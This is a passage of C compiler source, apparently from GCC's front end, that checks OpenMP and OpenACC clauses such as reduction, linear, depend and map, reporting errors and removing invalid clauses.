t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
{
remove = true;
break;
}
t = OMP_CLAUSE_DECL (c);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_REDUCTION_INSCAN (c))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inscan%> %<reduction%> clause with array "
"section");
remove = true;
break;
}
}
t = require_complete_type (OMP_CLAUSE_LOCATION (c), t);
if (t == error_mark_node)
{
remove = true;
break;
}
if (oacc_async)
c_mark_addressable (t);
type = TREE_TYPE (t);
if (TREE_CODE (t) == MEM_REF)
type = TREE_TYPE (type);
if (TREE_CODE (type) == ARRAY_TYPE)
{
tree oatype = type;
gcc_assert (TREE_CODE (t) != MEM_REF);
while (TREE_CODE (type) == ARRAY_TYPE)
type = TREE_TYPE (type);
if (integer_zerop (TYPE_SIZE_UNIT (type)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD in %<reduction%> clause is a zero size array",
t);
remove = true;
break;
}
tree size = size_binop (EXACT_DIV_EXPR, TYPE_SIZE_UNIT (oatype),
TYPE_SIZE_UNIT (type));
if (integer_zerop (size))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD in %<reduction%> clause is a zero size array",
t);
remove = true;
break;
}
size = size_binop (MINUS_EXPR, size, size_one_node);
size = save_expr (size);
tree index_type = build_index_type (size);
tree atype = build_array_type (type, index_type);
tree ptype = build_pointer_type (type);
if (TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
t = build_fold_addr_expr (t);
t = build2 (MEM_REF, atype, t, build_int_cst (ptype, 0));
OMP_CLAUSE_DECL (c) = t;
}
if (TYPE_ATOMIC (type))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %<reduction%> clause", t);
remove = true;
break;
}
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_REDUCTION_TASK (c))
{
/* Disallow zero sized or potentially zero sized task
reductions. */
if (integer_zerop (TYPE_SIZE_UNIT (type)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero sized type %qT in %qs clause", type,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
break;
}
else if (TREE_CODE (TYPE_SIZE_UNIT (type)) != INTEGER_CST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"variable sized type %qT in %qs clause", type,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
break;
}
}
if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) == NULL_TREE
&& (FLOAT_TYPE_P (type)
|| TREE_CODE (type) == COMPLEX_TYPE))
{
enum tree_code r_code = OMP_CLAUSE_REDUCTION_CODE (c);
const char *r_name = NULL;
switch (r_code)
{
case PLUS_EXPR:
case MULT_EXPR:
case MINUS_EXPR:
break;
case MIN_EXPR:
if (TREE_CODE (type) == COMPLEX_TYPE)
r_name = "min";
break;
case MAX_EXPR:
if (TREE_CODE (type) == COMPLEX_TYPE)
r_name = "max";
break;
case BIT_AND_EXPR:
r_name = "&";
break;
case BIT_XOR_EXPR:
r_name = "^";
break;
case BIT_IOR_EXPR:
r_name = "|";
break;
case TRUTH_ANDIF_EXPR:
if (FLOAT_TYPE_P (type))
r_name = "&&";
break;
case TRUTH_ORIF_EXPR:
if (FLOAT_TYPE_P (type))
r_name = "||";
break;
default:
gcc_unreachable ();
}
if (r_name)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE has invalid type for %<reduction(%s)%>",
t, r_name);
remove = true;
break;
}
}
else if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) == error_mark_node)
{
error_at (OMP_CLAUSE_LOCATION (c),
"user defined reduction not found for %qE", t);
remove = true;
break;
}
else if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c))
{
tree list = OMP_CLAUSE_REDUCTION_PLACEHOLDER (c);
type = TYPE_MAIN_VARIANT (type);
tree placeholder = build_decl (OMP_CLAUSE_LOCATION (c),
VAR_DECL, NULL_TREE, type);
tree decl_placeholder = NULL_TREE;
OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) = placeholder;
DECL_ARTIFICIAL (placeholder) = 1;
DECL_IGNORED_P (placeholder) = 1;
if (TREE_CODE (t) == MEM_REF)
{
decl_placeholder = build_decl (OMP_CLAUSE_LOCATION (c),
VAR_DECL, NULL_TREE, type);
OMP_CLAUSE_REDUCTION_DECL_PLACEHOLDER (c) = decl_placeholder;
DECL_ARTIFICIAL (decl_placeholder) = 1;
DECL_IGNORED_P (decl_placeholder) = 1;
}
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 0)))
c_mark_addressable (placeholder);
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 1)))
c_mark_addressable (decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c));
OMP_CLAUSE_REDUCTION_MERGE (c)
= c_clone_omp_udr (TREE_VEC_ELT (list, 2),
TREE_VEC_ELT (list, 0),
TREE_VEC_ELT (list, 1),
decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c), placeholder);
OMP_CLAUSE_REDUCTION_MERGE (c)
= build3_loc (OMP_CLAUSE_LOCATION (c), BIND_EXPR,
void_type_node, NULL_TREE,
OMP_CLAUSE_REDUCTION_MERGE (c), NULL_TREE);
TREE_SIDE_EFFECTS (OMP_CLAUSE_REDUCTION_MERGE (c)) = 1;
if (TREE_VEC_LENGTH (list) == 6)
{
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 3)))
c_mark_addressable (decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c));
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 4)))
c_mark_addressable (placeholder);
tree init = TREE_VEC_ELT (list, 5);
if (init == error_mark_node)
init = DECL_INITIAL (TREE_VEC_ELT (list, 3));
OMP_CLAUSE_REDUCTION_INIT (c)
= c_clone_omp_udr (init, TREE_VEC_ELT (list, 4),
TREE_VEC_ELT (list, 3),
decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c), placeholder);
if (TREE_VEC_ELT (list, 5) == error_mark_node)
{
tree v = decl_placeholder ? decl_placeholder : t;
OMP_CLAUSE_REDUCTION_INIT (c)
= build2 (INIT_EXPR, TREE_TYPE (v), v,
OMP_CLAUSE_REDUCTION_INIT (c));
}
if (walk_tree (&OMP_CLAUSE_REDUCTION_INIT (c),
c_find_omp_placeholder_r,
placeholder, NULL))
OMP_CLAUSE_REDUCTION_OMP_ORIG_REF (c) = 1;
}
else
{
tree init;
tree v = decl_placeholder ? decl_placeholder : t;
if (AGGREGATE_TYPE_P (TREE_TYPE (v)))
init = build_constructor (TREE_TYPE (v), NULL);
else
init = fold_convert (TREE_TYPE (v), integer_zero_node);
OMP_CLAUSE_REDUCTION_INIT (c)
= build2 (INIT_EXPR, TREE_TYPE (v), v, init);
}
OMP_CLAUSE_REDUCTION_INIT (c)
= build3_loc (OMP_CLAUSE_LOCATION (c), BIND_EXPR,
void_type_node, NULL_TREE,
OMP_CLAUSE_REDUCTION_INIT (c), NULL_TREE);
TREE_SIDE_EFFECTS (OMP_CLAUSE_REDUCTION_INIT (c)) = 1;
}
if (TREE_CODE (t) == MEM_REF)
{
if (TYPE_SIZE_UNIT (TREE_TYPE (TREE_TYPE (t))) == NULL_TREE
|| TREE_CODE (TYPE_SIZE_UNIT (TREE_TYPE (TREE_TYPE (t))))
!= INTEGER_CST)
{
sorry ("variable length element type in array "
"%<reduction%> clause");
remove = true;
break;
}
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == POINTER_PLUS_EXPR)
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == ADDR_EXPR)
t = TREE_OPERAND (t, 0);
}
goto check_dup_generic_t;
case OMP_CLAUSE_COPYPRIVATE:
copyprivate_seen = true;
if (nowait_clause)
{
error_at (OMP_CLAUSE_LOCATION (*nowait_clause),
"%<nowait%> clause must not be used together "
"with %<copyprivate%>");
*nowait_clause = OMP_CLAUSE_CHAIN (*nowait_clause);
nowait_clause = NULL;
}
goto check_dup_generic;
case OMP_CLAUSE_COPYIN:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) || !DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE must be %<threadprivate%> for %<copyin%>", t);
remove = true;
break;
}
goto check_dup_generic;
case OMP_CLAUSE_LINEAR:
if (ort != C_ORT_OMP_DECLARE_SIMD)
need_implicitly_determined = true;
t = OMP_CLAUSE_DECL (c);
if (ort != C_ORT_OMP_DECLARE_SIMD
&& OMP_CLAUSE_LINEAR_KIND (c) != OMP_CLAUSE_LINEAR_DEFAULT)
{
error_at (OMP_CLAUSE_LOCATION (c),
"modifier should not be specified in %<linear%> "
"clause on %<simd%> or %<for%> constructs");
OMP_CLAUSE_LINEAR_KIND (c) = OMP_CLAUSE_LINEAR_DEFAULT;
}
if (!INTEGRAL_TYPE_P (TREE_TYPE (t))
&& TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"linear clause applied to non-integral non-pointer "
"variable with type %qT", TREE_TYPE (t));
remove = true;
break;
}
if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qD in %<linear%> clause", t);
remove = true;
break;
}
if (ort == C_ORT_OMP_DECLARE_SIMD)
{
tree s = OMP_CLAUSE_LINEAR_STEP (c);
if (TREE_CODE (s) == PARM_DECL)
{
OMP_CLAUSE_LINEAR_VARIABLE_STRIDE (c) = 1;
/* map_head bitmap is used as uniform_head if
declare_simd. */
if (!bitmap_bit_p (&map_head, DECL_UID (s)))
linear_variable_step_check = true;
goto check_dup_generic;
}
if (TREE_CODE (s) != INTEGER_CST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<linear%> clause step %qE is neither constant "
"nor a parameter", s);
remove = true;
break;
}
}
if (TREE_CODE (TREE_TYPE (OMP_CLAUSE_DECL (c))) == POINTER_TYPE)
{
tree s = OMP_CLAUSE_LINEAR_STEP (c);
s = pointer_int_sum (OMP_CLAUSE_LOCATION (c), PLUS_EXPR,
OMP_CLAUSE_DECL (c), s);
s = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
sizetype, fold_convert (sizetype, s),
fold_convert
(sizetype, OMP_CLAUSE_DECL (c)));
if (s == error_mark_node)
s = size_one_node;
OMP_CLAUSE_LINEAR_STEP (c) = s;
}
else
OMP_CLAUSE_LINEAR_STEP (c)
= fold_convert (TREE_TYPE (t), OMP_CLAUSE_LINEAR_STEP (c));
goto check_dup_generic;
check_dup_generic:
t = OMP_CLAUSE_DECL (c);
check_dup_generic_t:
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if ((ort == C_ORT_ACC
&& OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION)
|| (ort == C_ORT_OMP
&& (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_USE_DEVICE_PTR
|| (OMP_CLAUSE_CODE (c)
== OMP_CLAUSE_USE_DEVICE_ADDR))))
{
if (bitmap_bit_p (&oacc_reduction_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
ort == C_ORT_ACC
? "%qD appears more than once in reduction clauses"
: "%qD appears more than once in data clauses",
t);
remove = true;
}
else
bitmap_set_bit (&oacc_reduction_head, DECL_UID (t));
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t))
|| bitmap_bit_p (&lastprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_PRIVATE
&& bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
break;
case OMP_CLAUSE_FIRSTPRIVATE:
t = OMP_CLAUSE_DECL (c);
need_complete = true;
need_implicitly_determined = true;
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %<firstprivate%>", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&firstprivate_head, DECL_UID (t));
break;
case OMP_CLAUSE_LASTPRIVATE:
t = OMP_CLAUSE_DECL (c);
need_complete = true;
need_implicitly_determined = true;
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %<lastprivate%>", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&lastprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else
bitmap_set_bit (&lastprivate_head, DECL_UID (t));
break;
case OMP_CLAUSE_ALIGNED:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %<aligned%> clause", t);
remove = true;
}
else if (!POINTER_TYPE_P (TREE_TYPE (t))
&& TREE_CODE (TREE_TYPE (t)) != ARRAY_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE in %<aligned%> clause is neither a pointer nor "
"an array", t);
remove = true;
}
else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qD in %<aligned%> clause", t);
remove = true;
break;
}
else if (bitmap_bit_p (&aligned_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in %<aligned%> clauses",
t);
remove = true;
}
else
bitmap_set_bit (&aligned_head, DECL_UID (t));
break;
case OMP_CLAUSE_NONTEMPORAL:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %<nontemporal%> clause", t);
remove = true;
}
else if (bitmap_bit_p (&oacc_reduction_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in %<nontemporal%> "
"clauses", t);
remove = true;
}
else
bitmap_set_bit (&oacc_reduction_head, DECL_UID (t));
break;
case OMP_CLAUSE_DEPEND:
t = OMP_CLAUSE_DECL (c);
if (t == NULL_TREE)
{
gcc_assert (OMP_CLAUSE_DEPEND_KIND (c)
== OMP_CLAUSE_DEPEND_SOURCE);
break;
}
if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_SINK)
{
gcc_assert (TREE_CODE (t) == TREE_LIST);
for (; t; t = TREE_CHAIN (t))
{
tree decl = TREE_VALUE (t);
if (TREE_CODE (TREE_TYPE (decl)) == POINTER_TYPE)
{
tree offset = TREE_PURPOSE (t);
bool neg = wi::neg_p (wi::to_wide (offset));
offset = fold_unary (ABS_EXPR, TREE_TYPE (offset), offset);
tree t2 = pointer_int_sum (OMP_CLAUSE_LOCATION (c),
neg ? MINUS_EXPR : PLUS_EXPR,
decl, offset);
t2 = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
sizetype,
fold_convert (sizetype, t2),
fold_convert (sizetype, decl));
if (t2 == error_mark_node)
{
remove = true;
break;
}
TREE_PURPOSE (t) = t2;
}
}
break;
}
if (TREE_CODE (t) == TREE_LIST
&& TREE_PURPOSE (t)
&& TREE_CODE (TREE_PURPOSE (t)) == TREE_VEC)
{
if (TREE_PURPOSE (t) != last_iterators)
last_iterators_remove
= c_omp_finish_iterators (TREE_PURPOSE (t));
last_iterators = TREE_PURPOSE (t);
t = TREE_VALUE (t);
if (last_iterators_remove)
t = error_mark_node;
}
else
last_iterators = NULL_TREE;
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
remove = true;
else if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_DEPOBJ)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<depend%> clause with %<depobj%> dependence "
"type on array section");
remove = true;
}
break;
}
if (t == error_mark_node)
remove = true;
else if (!lvalue_p (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not lvalue expression nor array section in "
"%<depend%> clause", t);
remove = true;
}
else if (TREE_CODE (t) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause", t, "depend");
remove = true;
}
else if (OMP_CLAUSE_DEPEND_KIND (c) == OMP_CLAUSE_DEPEND_DEPOBJ)
{
if (!c_omp_depend_t_p (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have %<omp_depend_t%> type in "
"%<depend%> clause with %<depobj%> dependence "
"type", t);
remove = true;
}
}
else if (c_omp_depend_t_p (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE should not have %<omp_depend_t%> type in "
"%<depend%> clause with dependence type other than "
"%<depobj%>", t);
remove = true;
}
if (!remove)
{
tree addr = build_unary_op (OMP_CLAUSE_LOCATION (c), ADDR_EXPR,
t, false);
if (addr == error_mark_node)
remove = true;
else
{
t = build_indirect_ref (OMP_CLAUSE_LOCATION (c), addr,
RO_UNARY_STAR);
if (t == error_mark_node)
remove = true;
else if (TREE_CODE (OMP_CLAUSE_DECL (c)) == TREE_LIST
&& TREE_PURPOSE (OMP_CLAUSE_DECL (c))
&& (TREE_CODE (TREE_PURPOSE (OMP_CLAUSE_DECL (c)))
== TREE_VEC))
TREE_VALUE (OMP_CLAUSE_DECL (c)) = t;
else
OMP_CLAUSE_DECL (c) = t;
}
}
break;
case OMP_CLAUSE_MAP:
case OMP_CLAUSE_TO:
case OMP_CLAUSE_FROM:
case OMP_CLAUSE__CACHE_:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
remove = true;
else
{
t = OMP_CLAUSE_DECL (c);
if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"array section does not have mappable type "
"in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
while (TREE_CODE (t) == ARRAY_REF)
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == COMPONENT_REF
&& TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
{
while (TREE_CODE (t) == COMPONENT_REF)
t = TREE_OPERAND (t, 0);
if (bitmap_bit_p (&map_field_head, DECL_UID (t)))
break;
if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in motion "
"clauses", t);
else if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data "
"clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in map "
"clauses", t);
remove = true;
}
else
{
bitmap_set_bit (&map_head, DECL_UID (t));
bitmap_set_bit (&map_field_head, DECL_UID (t));
}
}
}
if (c_oacc_check_attachments (c))
remove = true;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
/* In this case, we have a single array element which is a
pointer, and we already set OMP_CLAUSE_SIZE in
handle_omp_array_sections above. For attach/detach clauses,
reset the OMP_CLAUSE_SIZE (representing a bias) to zero
here. */
OMP_CLAUSE_SIZE (c) = size_zero_node;
break;
}
if (t == error_mark_node)
{
remove = true;
break;
}
/* OpenACC attach / detach clauses must be pointers. */
if (c_oacc_check_attachments (c))
{
remove = true;
break;
}
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
/* For attach/detach clauses, set OMP_CLAUSE_SIZE (representing a
bias) to zero here, so it is not set erroneously to the pointer
size later on in gimplify.c. */
OMP_CLAUSE_SIZE (c) = size_zero_node;
if (TREE_CODE (t) == COMPONENT_REF
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE__CACHE_)
{
if (DECL_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have a mappable type in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
while (TREE_CODE (t) == COMPONENT_REF)
{
if (TREE_CODE (TREE_TYPE (TREE_OPERAND (t, 0)))
== UNION_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is a member of a union", t);
remove = true;
break;
}
t = TREE_OPERAND (t, 0);
if (ort == C_ORT_ACC && TREE_CODE (t) == MEM_REF)
{
if (maybe_ne (mem_ref_offset (t), 0))
error_at (OMP_CLAUSE_LOCATION (c),
"cannot dereference %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
t = TREE_OPERAND (t, 0);
}
}
if (remove)
break;
if (VAR_P (t) || TREE_CODE (t) == PARM_DECL)
{
if (bitmap_bit_p (&map_field_head, DECL_UID (t)))
break;
}
}
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (VAR_P (t) && DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if ((OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP
|| (OMP_CLAUSE_MAP_KIND (c)
!= GOMP_MAP_FIRSTPRIVATE_POINTER))
&& !c_mark_addressable (t))
remove = true;
else if (!(OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_POINTER
|| (OMP_CLAUSE_MAP_KIND (c)
== GOMP_MAP_FIRSTPRIVATE_POINTER)
|| (OMP_CLAUSE_MAP_KIND (c)
== GOMP_MAP_FORCE_DEVICEPTR)))
&& t == OMP_CLAUSE_DECL (c)
&& !lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD does not have a mappable type in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_TYPE (t) == error_mark_node)
remove = true;
else if (TYPE_ATOMIC (strip_array_types (TREE_TYPE (t))))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_FIRSTPRIVATE_POINTER)
{
if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
remove = true;
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in motion clauses", t);
else if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in map clauses", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
{
bitmap_set_bit (&map_head, DECL_UID (t));
if (t != OMP_CLAUSE_DECL (c)
&& TREE_CODE (OMP_CLAUSE_DECL (c)) == COMPONENT_REF)
bitmap_set_bit (&map_field_head, DECL_UID (t));
}
break;
case OMP_CLAUSE_TO_DECLARE:
case OMP_CLAUSE_LINK:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == FUNCTION_DECL
&& OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO_DECLARE)
;
else if (!VAR_P (t))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO_DECLARE)
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is neither a variable nor a function name in "
"clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (!lang_hooks.types.omp_mappable_type (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD does not have a mappable type in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
if (remove)
break;
if (bitmap_bit_p (&generic_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once on the same "
"%<declare target%> directive", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
break;
case OMP_CLAUSE_UNIFORM:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) != PARM_DECL)
{
if (DECL_P (t))
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is not an argument in %<uniform%> clause", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not an argument in %<uniform%> clause", t);
remove = true;
break;
}
/* map_head bitmap is used as uniform_head if declare_simd. */
bitmap_set_bit (&map_head, DECL_UID (t));
goto check_dup_generic;
case OMP_CLAUSE_IS_DEVICE_PTR:
case OMP_CLAUSE_USE_DEVICE_PTR:
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_USE_DEVICE_PTR
&& ort == C_ORT_OMP)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qs variable is not a pointer",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_CODE (TREE_TYPE (t)) != ARRAY_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qs variable is neither a pointer nor an array",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
}
goto check_dup_generic;
case OMP_CLAUSE_USE_DEVICE_ADDR:
t = OMP_CLAUSE_DECL (c);
if (VAR_P (t) || TREE_CODE (t) == PARM_DECL)
c_mark_addressable (t);
goto check_dup_generic;
case OMP_CLAUSE_NOWAIT:
if (copyprivate_seen)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<nowait%> clause must not be used together "
"with %<copyprivate%>");
remove = true;
break;
}
nowait_clause = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_ORDER:
if (ordered_clause)
